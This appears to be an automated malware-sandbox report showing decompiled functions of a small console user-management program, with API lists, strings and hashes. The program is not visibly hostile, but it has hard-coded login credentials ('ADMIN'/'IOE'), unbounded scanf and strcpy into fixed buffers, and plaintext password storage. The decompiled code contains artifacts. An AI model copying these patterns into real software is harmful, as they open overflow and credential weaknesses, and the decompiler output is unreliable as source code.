Uniqueness Score: -1.00%

Function 00232600, Relevance: 72.0, APIs: 25, Strings: 16, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00232600(void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				int _t58;
				int _t81;
				int _t84;
				void* _t104;
				void* _t112;
				void* _t113;
				void* _t118;
				void* _t128;

				_t128 = __fp0;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E00231000(7, 5);
					printf("Only THREE attempts shall be allowed to enter username and password.");
					E002310D0(0xa, 8, 0x46, 0xf);
					E00231000(0x17, 0xa);
					printf("Enter User name : ");
					_push( &_v92);
					scanf("%s");
					E00231000(0x17, 0xc);
					printf("Password        : ");
					E00231040( &_v60);
					strcpy( &_v92, _strupr( &_v92));
					strcpy( &_v60, _strupr( &_v60));
					_t112 = _t104 + 0x2c;
					_t93 = _v16 + 1;
					_v16 = _v16 + 1;
					if(_v16 == 3) {
						E002323F0(_t93, _t128);
						E00231000(0x19, 8);
						printf(0x239378);
						E00231000(0x16, 0xb);
						printf("Press any key to exit the program...");
						_t112 = _t112 + 8;
						exit(0);
					}
					_t58 = strcmp( &_v92, "ADMIN");
					_t113 = _t112 + 8;
					if(_t58 != 0) {
						L6:
						E002323F0(_t93, _t128);
						E00231000(0x19, 0xa);
						printf(0x2393cc);
						_t104 = _t113 + 4;
					} else {
						_t84 = strcmp( &_v60, "IOE");
						_t113 = _t113 + 8;
						if(_t84 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
				} while (_v20 != 1);
				do {
					E002323F0(_t93, _t128);
					E00231000(0x1e, 8);
					printf("1. Add User");
					E00231000(0x1e, 0xa);
					printf("2. Delete User");
					E00231000(0x1e, 0xc);
					printf("3. Edit User name / Password");
					E00231000(0x1e, 0xe);
					printf("4. View User Log");
					E00231000(0x1e, 0x10);
					printf("5. Exit");
					_t118 = _t104 + 0x14;
					E00231000(1, 0x11);
					_v24 = 0;
					while(_v24 < 0x4e) {
						printf("_");
						_t118 = _t118 + 4;
						_v24 = _v24 + 1;
					}
					E00231000(0x17, 0x13);
					printf(" Press a number between the range [1 -5]  ");
					_t104 = _t118 + 4;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_t93 = _v12 - 1;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E002323F0(_t93, _t128);
						E00231000(0xa, 0xa);
						printf("Your input is out of range! Enter a choice between 1 to 5!");
						E00231000(0xf, 0xc);
						_t81 = printf("Press ENTER to return to main menu...");
						_t104 = _t104 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M00232904))) {
							case 0:
								_t81 = E00232920(_t128);
								goto L23;
							case 1:
								E00232C00(__ecx, __fp0);
								goto L23;
							case 2:
								E00233000(__fp0);
								goto L23;
							case 3:
								E00233460(__edx, __eflags, __fp0);
								goto L23;
							case 4:
								E002323F0(__ecx, __fp0);
								E00231000(0xf, 0xa);
								printf("Are you sure you want to exit? <Y/N> : ");
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									exit(0);
								} else {
									__ecx = _v5;
									__eflags = __ecx - 0x79;
									if(__ecx == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					__eflags = 1;
				} while (1 != 0);
				return _t81;
			}

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00232647

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

printf.MSVCRT ref: 0023266B
scanf.MSVCRT ref: 0023267D
printf.MSVCRT ref: 00232694

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

_strupr.MSVCRT ref: 002326AA
strcpy.MSVCRT(?,00000000), ref: 002326B8
_strupr.MSVCRT ref: 002326C4
strcpy.MSVCRT(00000000,00000000), ref: 002326D2
printf.MSVCRT ref: 002326FC
printf.MSVCRT ref: 00232713
exit.MSVCRT ref: 0023271E

Part of subcall function 002323F0: printf.MSVCRT ref: 00232464

strcmp.MSVCRT ref: 0023272D
strcmp.MSVCRT ref: 00232742
printf.MSVCRT ref: 0023276A

Part of subcall function 00232920: printf.MSVCRT ref: 0023298D
Part of subcall function 00232920: scanf.MSVCRT ref: 002329A0
Part of subcall function 00232920: fopen.MSVCRT ref: 002329B3
Part of subcall function 00232920: fscanf.MSVCRT ref: 002329E4
Part of subcall function 00232920: _strupr.MSVCRT ref: 002329F6
Part of subcall function 00232920: strcpy.MSVCRT(?,00000000), ref: 00232A04
Part of subcall function 00232920: _strupr.MSVCRT ref: 00232A11
Part of subcall function 00232920: strcpy.MSVCRT(0023B244,00000000), ref: 00232A20
Part of subcall function 00232920: strcmp.MSVCRT ref: 00232A31
Part of subcall function 00232920: fclose.MSVCRT ref: 00232A4E
Part of subcall function 00232920: printf.MSVCRT ref: 00232A6B

printf.MSVCRT ref: 00232790
printf.MSVCRT ref: 002327A7
printf.MSVCRT ref: 002327BE
printf.MSVCRT ref: 002327D5
printf.MSVCRT ref: 002327EC
printf.MSVCRT ref: 0023281B
printf.MSVCRT ref: 00232834

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Strings

Press a number between the range [1 -5] , xrefs: 0023282F
Password : , xrefs: 0023268F
5. Exit, xrefs: 002327E7
2. Delete User, xrefs: 002327A2
Only THREE attempts shall be allowed to enter username and password., xrefs: 00232642
Are you sure you want to exit? <Y/N> : , xrefs: 00232893
Your input is out of range! Enter a choice between 1 to 5!, xrefs: 002328CB
Press any key to exit the program..., xrefs: 0023270E
1. Add User, xrefs: 0023278B
3. Edit User name / Password, xrefs: 002327B9
Enter User name : , xrefs: 00232666
4. View User Log, xrefs: 002327D0
Press ENTER to return to main menu..., xrefs: 002328E2
N, xrefs: 00232810
ADMIN, xrefs: 00232724
IOE, xrefs: 00232739

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_struprstrcmpstrcpy$_strdatescanf$ConsoleCursorHandlePositionexitfclosefopenfscanfisprint
String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
API String ID: 1012356128-2046970424
Opcode ID: 6b9369546028292ee44304aefdd7867ec29a9f5ea0188d28a97c0b403f64ac0c
Instruction ID: 8925a46c8bb040fb9feba33ee9f4a763a80e918939b62210a9b2f50fd44da918
Opcode Fuzzy Hash: 6b9369546028292ee44304aefdd7867ec29a9f5ea0188d28a97c0b403f64ac0c
Instruction Fuzzy Hash: 0E7151F0A60344EBEB14ABF4AD4BB9D7670AF11B05F100024F606B91D5DAF161B89B67

Uniqueness

Uniqueness Score: -1.00%

Function 00232920, Relevance: 61.4, APIs: 24, Strings: 11, Instructions: 198
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00232920(void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				struct _IO_FILE* _t47;
				int _t49;
				struct _IO_FILE* _t50;
				int _t60;
				struct _IO_FILE* _t61;
				struct _IO_FILE* _t62;
				int _t63;
				struct _IO_FILE* _t68;
				int _t86;
				struct _IO_FILE* _t88;
				struct _IO_FILE* _t90;
				struct _IO_FILE* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t124;

				_t124 = __fp0;
				_v8 = 0;
				_v12 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v76 = 0;
				_t87 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				do {
					E002323F0(_t87, _t124);
					_v8 = 0;
					E00231000(0x19, 8);
					printf("User Name        : ");
					_push(0x23b244);
					scanf("%s");
					_t47 = fopen("USER.DAT", "r");
					_t104 = _t101 + 0x14;
					 *0x23b288 = _t47;
					_v12 = 0;
					while(1) {
						_t88 =  *0x23b288; // 0x0
						_t49 = fscanf(_t88, "%s %s %s\n", 0x23b240,  &_v108,  &_v140);
						_t105 = _t104 + 0x14;
						if(_t49 == 0xffffffff) {
							goto L6;
						}
						strcpy( &_v108, _strupr( &_v108));
						strcpy(0x23b244, _strupr(0x23b244));
						_t86 = strcmp( &_v108, 0x23b244);
						_t104 = _t105 + 0x20;
						if(_t86 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t50 =  *0x23b288; // 0x0
					fclose(_t50);
					_t106 = _t105 + 4;
					if(_v12 == 0) {
						E00231000(0x19, 0xa);
						printf("Password         : ");
						E00231040( &_v44);
						strcpy(0x23b262,  &_v44);
						E00231000(0x19, 0xc);
						printf("Confirm Password : ");
						_t87 =  &_v76;
						E00231040( &_v76);
						_t60 = strcmp(0x23b262,  &_v76);
						_t101 = _t106 + 0x18;
						if(_t60 != 0) {
							E002323F0( &_v76, _t124);
							E00231000(0xa, 0xa);
							printf(0x239598);
							_t101 = _t101 + 4;
							_v8 = _v8 + 1;
						}
					} else {
						E00231000(0xa, 0xa);
						printf(0x239534);
						_t101 = _t106 + 4;
						_t87 = _v8 + 1;
						_v8 = _v8 + 1;
					}
				} while (_v8 != 0);
				_t61 = fopen("USER.DAT", 0x2395c8);
				_t110 = _t101 + 8;
				 *0x23b288 = _t61;
				if( *0x23b288 != 0) {
					while(1) {
						_t62 =  *0x23b288; // 0x0
						_t63 = fscanf(_t62, "%s %s %s\n", 0x23b240,  &_v108,  &_v140);
						_t110 = _t110 + 0x14;
						if(_t63 == 0xffffffff) {
							break;
						}
					}
					E002312C0( &_v140, 0x23b240);
					L16:
					_t90 =  *0x23b288; // 0x0
					fclose(_t90);
					 *0x23b288 = fopen("USER.DAT", "a");
					_push(0x23b262);
					_push(0x23b244);
					_push(0x23b240);
					_t97 =  *0x23b288; // 0x0
					fprintf(_t97, "%s %s %s\n");
					_t68 =  *0x23b288; // 0x0
					fclose(_t68);
					E002323F0(_t90, _t124);
					E00231000(0x19, 0xa);
					return printf("Record ADDED successfully!");
				}
				strcpy(0x23b240, "U01");
				_t110 = _t110 + 8;
				goto L16;
			}

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023298D
scanf.MSVCRT ref: 002329A0
fopen.MSVCRT ref: 002329B3
fscanf.MSVCRT ref: 002329E4
_strupr.MSVCRT ref: 002329F6
strcpy.MSVCRT(?,00000000), ref: 00232A04
_strupr.MSVCRT ref: 00232A11
strcpy.MSVCRT(0023B244,00000000), ref: 00232A20
strcmp.MSVCRT ref: 00232A31
fclose.MSVCRT ref: 00232A4E
printf.MSVCRT ref: 00232A6B
printf.MSVCRT ref: 00232A90
strcpy.MSVCRT(0023B262,00000000,00000000), ref: 00232AAB
printf.MSVCRT ref: 00232AC1
strcmp.MSVCRT ref: 00232ADC
printf.MSVCRT ref: 00232AFB
fopen.MSVCRT ref: 00232B21
strcpy.MSVCRT(0023B240,U01,?,?,?,?,?,?,00000000), ref: 00232B42
fscanf.MSVCRT ref: 00232B67
fclose.MSVCRT ref: 00232B88
fopen.MSVCRT ref: 00232B9B
fprintf.MSVCRT ref: 00232BC4
fclose.MSVCRT ref: 00232BD3
printf.MSVCRT ref: 00232BEF

Strings

U01, xrefs: 00232B38
%s %s %s, xrefs: 00232BB8
%s %s %s, xrefs: 002329D8
Password : , xrefs: 00232A8B
USER.DAT, xrefs: 00232B96
User Name : , xrefs: 00232988
USER.DAT, xrefs: 002329AE
USER.DAT, xrefs: 00232B1C
%s %s %s, xrefs: 00232B5C
Record ADDED successfully!, xrefs: 00232BEA
Confirm Password : , xrefs: 00232ABC

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$fclosefopenstrcmp$_strdate_struprfscanf$ConsoleCursorHandlePositionfprintfscanf
String ID: %s %s %s$%s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$U01$USER.DAT$USER.DAT$USER.DAT$User Name :
API String ID: 3308860163-3959593621
Opcode ID: c51bf1250e6144a556344a7bf910ff1b522aa09426f24c0f2b17c5da145ac9a7
Instruction ID: fba5230279d724363b466a180fe38769d4aed183f013dfb1b73e9e5281fd58b8
Opcode Fuzzy Hash: c51bf1250e6144a556344a7bf910ff1b522aa09426f24c0f2b17c5da145ac9a7
Instruction Fuzzy Hash: 8871A8F0E60304EFDB15DFA4EC4AB8E7774AF16705F040125FA05A6291DBB056B8CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00231E50, Relevance: 58.6, APIs: 20, Strings: 19, Instructions: 134
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00231E50(void* __ecx, signed int _a4, char* _a8) {
				signed int _v8;

				_v8 = _a4;
				_v8 = _v8 - 1;
				if(_v8 > 0x12) {
					return strcpy(_a8, 0x23b225);
				}
				switch( *((intOrPtr*)(_v8 * 4 +  &M00232020))) {
					case 0:
						return strcpy(_a8, "One ");
					case 1:
						__ecx = _a8;
						return strcpy(_a8, "Two ");
					case 2:
						return strcpy(_a8, "Three ");
					case 3:
						__eax = _a8;
						return strcpy(_a8, "Four ");
					case 4:
						__ecx = _a8;
						return strcpy(_a8, "Five ");
					case 5:
						return strcpy(_a8, "Six ");
					case 6:
						__eax = _a8;
						return strcpy(_a8, "Seven ");
					case 7:
						__ecx = _a8;
						return strcpy(_a8, "Eight ");
					case 8:
						return strcpy(_a8, "Nine ");
					case 9:
						__eax = _a8;
						return strcpy(_a8, "Ten ");
					case 0xa:
						__ecx = _a8;
						return strcpy(_a8, "Eleven ");
					case 0xb:
						return strcpy(_a8, "Tweleve ");
					case 0xc:
						__eax = _a8;
						return strcpy(_a8, "Thirteen ");
					case 0xd:
						__ecx = _a8;
						return strcpy(_a8, "Fourteen ");
					case 0xe:
						return strcpy(_a8, "Fifteen ");
					case 0xf:
						__eax = _a8;
						return strcpy(_a8, "Sixteen ");
					case 0x10:
						__ecx = _a8;
						return strcpy(_a8, "Seventeen ");
					case 0x11:
						return strcpy(_a8, "Eighteen ");
					case 0x12:
						__eax = _a8;
						return strcpy(_a8, "Nineteen ");
				}
			}

APIs

strcpy.MSVCRT(00231C43,One ,?,?,00231C43,?), ref: 00231E80
strcpy.MSVCRT(?,Two ,?), ref: 00231E96
strcpy.MSVCRT(?,Three ,?,?,?,?), ref: 00231EAC
strcpy.MSVCRT(?,Four ,?,?,?,?,?,?), ref: 00231EC2
strcpy.MSVCRT(?,Five ,?,?,?,?,?,?,?,?), ref: 00231ED8
strcpy.MSVCRT(?,Six ,?,?,?,?,?,?,?,?,?,?), ref: 00231EEE
strcpy.MSVCRT(?,Seven ,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231F04
strcpy.MSVCRT(?,Eight ,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231F1A
strcpy.MSVCRT(?,Nine ), ref: 00231F30
strcpy.MSVCRT(?,Ten ), ref: 00231F46
strcpy.MSVCRT(?,Eleven ), ref: 00231F5C
strcpy.MSVCRT(?,Tweleve ), ref: 00231F72
strcpy.MSVCRT(?,Thirteen ), ref: 00231F88
strcpy.MSVCRT(?,Fourteen ), ref: 00231F9E
strcpy.MSVCRT(?,Fifteen ), ref: 00231FB1
strcpy.MSVCRT(?,Sixteen ), ref: 00231FC4
strcpy.MSVCRT(?,Seventeen ), ref: 00231FD7
strcpy.MSVCRT(?,Eighteen ), ref: 00231FEA
strcpy.MSVCRT(?,Nineteen ), ref: 00231FFD
strcpy.MSVCRT(00231C43,0023B225,?,?,00231C43,?), ref: 00232010

Strings

Fifteen , xrefs: 00231FA8
Eighteen , xrefs: 00231FE1
Nineteen , xrefs: 00231FF4
Eight , xrefs: 00231F11
Ten , xrefs: 00231F3D
Four , xrefs: 00231EB9
Five , xrefs: 00231ECF
Six , xrefs: 00231EE5
Eleven , xrefs: 00231F53
Two , xrefs: 00231E8D
Fourteen , xrefs: 00231F95
Nine , xrefs: 00231F27
Sixteen , xrefs: 00231FBB
Three , xrefs: 00231EA3
Seven , xrefs: 00231EFB
Seventeen , xrefs: 00231FCE
One , xrefs: 00231E77
Tweleve , xrefs: 00231F69
Thirteen , xrefs: 00231F7F

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy
String ID: Eight $Eighteen $Eleven $Fifteen $Five $Four $Fourteen $Nine $Nineteen $One $Seven $Seventeen $Six $Sixteen $Ten $Thirteen $Three $Tweleve $Two
API String ID: 3177657795-1665498770
Opcode ID: 0190d47a1ef9e5ad3781f6798dde7779363ae8ea089f24e483f2bd475fe3cf28
Instruction ID: 0ea6ee545e835b7a8d88a8d46d6b6a6beb11fdff9f005587e5650ef3a86ba3f7
Opcode Fuzzy Hash: 0190d47a1ef9e5ad3781f6798dde7779363ae8ea089f24e483f2bd475fe3cf28
Instruction Fuzzy Hash: B54165F9B78304F7CA289AA0ECC2C5D33155B76701F148A16B84916341E5B5EB3DEBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00231410, Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 209
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00231410(long long __fp0, char* _a4, char _a12245929) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long long _v36;
				long long _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v72;
				signed int _t138;
				signed int _t160;
				void* _t165;
				void* _t166;
				void* _t167;
				long long _t177;

				_t177 = __fp0;
				_v56 = (_a4[3] - 0x30) * 0xa +  *((char*)(_a4 + (1 << 2))) - 0x30;
				_v20 = ( *_a4 - 0x30) * 0xa + _a4[1] - 0x30;
				_v48 = (_a4[6] - 0x30) * 0xa + _a4[7] + 0x7a0;
				_v12 = _v20;
				_v12 = _v12 - 1;
				if(_v12 <= 0xb) {
					switch( *((intOrPtr*)(_v12 * 4 +  &M00231700))) {
						case 0:
							strcpy( &_v52, "Jan");
							_t166 = _t166 + 8;
							goto L14;
						case 1:
							strcpy( &_v52, "Feb");
							goto L14;
						case 2:
							strcpy( &_v52, "Mar");
							goto L14;
						case 3:
							strcpy( &_v52, "Apr");
							goto L14;
						case 4:
							strcpy( &_v52, "May");
							goto L14;
						case 5:
							strcpy( &_v52, "Jun");
							goto L14;
						case 6:
							strcpy( &_v52, "Jul");
							goto L14;
						case 7:
							strcpy( &_v52, "Aug");
							goto L14;
						case 8:
							strcpy( &_v52, "Sep");
							goto L14;
						case 9:
							strcpy( &_v52, "Oct");
							goto L14;
						case 0xa:
							strcpy( &_v52, "Nov");
							goto L14;
						case 0xb:
							strcpy( &_v52, "Dec");
							goto L14;
					}
				}
				L14:
				asm("cdq");
				 *((char*)(_t165 + 0xffffffffffffffbc)) = _v56 / 0xa + 0x30;
				asm("cdq");
				 *((char*)(_t165 + 0xbadb69)) = _v56 % 0xa + 0x30;
				 *((char*)(_t165 + 0xbadb69)) = 0x20;
				 *((char*)(_t165 + 0xffffffffffffffbf)) = 0;
				strcat( &_v72,  &_v52);
				_t167 = _t166 + 8;
				_t160 = 6;
				_a12245929 = 0x2c;
				_v16 = 0;
				 *((char*)(_t165 + 0xffffffffffffffc3)) = 0x20;
				_v8 = 3;
				while(_v8 >= 0) {
					asm("cvtsi2sd xmm0, dword [ebp-0x2c]");
					asm("cvtsi2sd xmm1, dword [ebp-0x4]");
					asm("movsd [esp], xmm1");
					asm("movsd xmm1, [0x238120]");
					asm("movsd [esp], xmm1");
					asm("movsd [ebp-0x18], xmm0");
					L00237C82();
					_v36 = _t177;
					asm("movsd xmm0, [ebp-0x18]");
					asm("divsd xmm0, [ebp-0x20]");
					asm("cvttsd2si edx, xmm0");
					 *((char*)(_t165 + _v16 - 0x3c)) = _t160 + 0x30;
					_t138 = _v16 + 1;
					_v16 = _t138;
					asm("cvtsi2sd xmm0, dword [ebp-0x4]");
					asm("movsd [esp], xmm0");
					asm("movsd xmm0, [0x238120]");
					asm("movsd [esp], xmm0");
					L00237C82();
					_t167 = _t167 + 0x10 + 0x10;
					_v44 = _t177;
					asm("movsd xmm0, [ebp-0x28]");
					asm("cvttsd2si ecx, xmm0");
					asm("cdq");
					_t160 = _v48 % _t138;
					_v48 = _t160;
					_v8 = _v8 - 1;
				}
				 *((char*)(_t165 + 0xffffffffffffffc8)) = 0;
				return strcpy(_a4,  &_v72);
			}

APIs

strcpy.MSVCRT(?,Jan), ref: 002314C6
strcpy.MSVCRT(?,Feb), ref: 002314DC
strcpy.MSVCRT(?,Mar), ref: 002314F2
strcpy.MSVCRT(?,Apr), ref: 00231508
strcpy.MSVCRT(?,May), ref: 0023151E
strcpy.MSVCRT(?,Jun), ref: 00231534
strcpy.MSVCRT(?,Jul), ref: 00231547
strcpy.MSVCRT(?,Aug), ref: 0023155A
strcpy.MSVCRT(?,Sep), ref: 0023156D
strcpy.MSVCRT(?,Oct), ref: 00231580
strcpy.MSVCRT(?,Nov), ref: 00231593
strcpy.MSVCRT(?,Dec), ref: 002315A6
strcat.MSVCRT(00000000,?), ref: 00231603
pow.MSVCRT ref: 0023166F
pow.MSVCRT ref: 002316B8
strcpy.MSVCRT(0000000B,00000000), ref: 002316EF

Strings

Mar, xrefs: 002314E9
Apr, xrefs: 002314FF
May, xrefs: 00231515
Feb, xrefs: 002314D3
Jan, xrefs: 002314BD
Sep, xrefs: 00231564
Jun, xrefs: 0023152B
Nov, xrefs: 0023158A
Oct, xrefs: 00231577
Jul, xrefs: 0023153E
Aug, xrefs: 00231551
Dec, xrefs: 0023159D
, xrefs: 00231627

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy$strcat
String ID: $Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
API String ID: 3927648046-2641305345
Opcode ID: 50d0ab4d9ff39b21de42d7166adc25e4a223db886e90a655e6c1a87c3e115a6a
Instruction ID: f6680ae31f4b8c49e8b863ab027b11f0a28196120ce084483dcc0a059e24c644
Opcode Fuzzy Hash: 50d0ab4d9ff39b21de42d7166adc25e4a223db886e90a655e6c1a87c3e115a6a
Instruction Fuzzy Hash: 47811DF1E2420CDFCB08DFA8D991AEDBB76EF46300F18562EF40266380E6759664CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00231A20, Relevance: 48.3, APIs: 25, Strings: 7, Instructions: 340
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00231A20(char* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v28;
				signed int _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v92;
				int _v96;
				void _v171;
				char _v172;
				void* _t192;
				int _t218;
				int _t221;
				void* _t350;
				void* _t351;
				void* _t352;
				void* _t354;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v172 = 0;
				_t192 = memset( &_v171, 0, 0x31);
				_t352 = _t351 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t192;
				asm("cdq");
				 *(_t350 + 0xffffffffffffffa0) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t350 + _v8 * 4 - 0x74) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v76 =  *(_t350 + 0xffffffffffffffa0);
				asm("cdq");
				_v32 = _v76 / 0x64;
				asm("cdq");
				_v12 = _v76 % 0x64;
				asm("cdq");
				_v72 = _v12 / 0xa;
				asm("cdq");
				_v80 = _v12 % 0xa;
				if(_v12 >= 0x14 || _v32 == 0) {
					if(_v12 >= 0x14 || _v32 != 0) {
						if(_v12 <= 0x14 || _v32 == 0) {
							E00232070( &_v92, _v72,  &_v92);
							strcpy( &_v64,  &_v92);
							E00231E50( &_v64, _v80,  &_v28);
							strcat( &_v64,  &_v28);
							_t354 = _t352 + 0x10;
						} else {
							E00231E50(_v32, _v32,  &_v28);
							strcpy( &_v64,  &_v28);
							strcat( &_v64, "Hundred ");
							E00232070( &_v64, _v72,  &_v92);
							strcat( &_v64,  &_v92);
							E00231E50(_v80, _v80,  &_v28);
							strcat( &_v64,  &_v28);
							_t354 = _t352 + 0x20;
						}
					} else {
						E00231E50(0xa, _v12,  &_v28);
						strcpy( &_v64,  &_v28);
						_t354 = _t352 + 8;
					}
				} else {
					E00231E50(0xa, _v32,  &_v28);
					strcpy( &_v64,  &_v28);
					strcat( &_v64, "Hundred ");
					E00231E50( &_v28, _v12,  &_v28);
					strcat( &_v64,  &_v28);
					_t354 = _t352 + 0x18;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t350 + _v8 * 4 - 0x74) >= 0x14) {
						asm("cdq");
						E00232070(0xa,  *(_t350 + _v8 * 4 - 0x74) / 0xa,  &_v92);
						strcpy(_t350 + _v8 * 0x1e - 0x140,  &_v92);
						asm("cdq");
						E00231E50(0xa,  *(_t350 + _v8 * 4 - 0x74) % 0xa,  &_v28);
						strcat(_t350 + _v8 * 0x1e - 0x140,  &_v28);
						_t354 = _t354 + 0x10;
					} else {
						E00231E50( *(_t350 + _v8 * 4 - 0x74),  *(_t350 + _v8 * 4 - 0x74),  &_v28);
						strcpy(_t350 + _v8 * 0x1e - 0x140,  &_v28);
						_t354 = _t354 + 8;
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
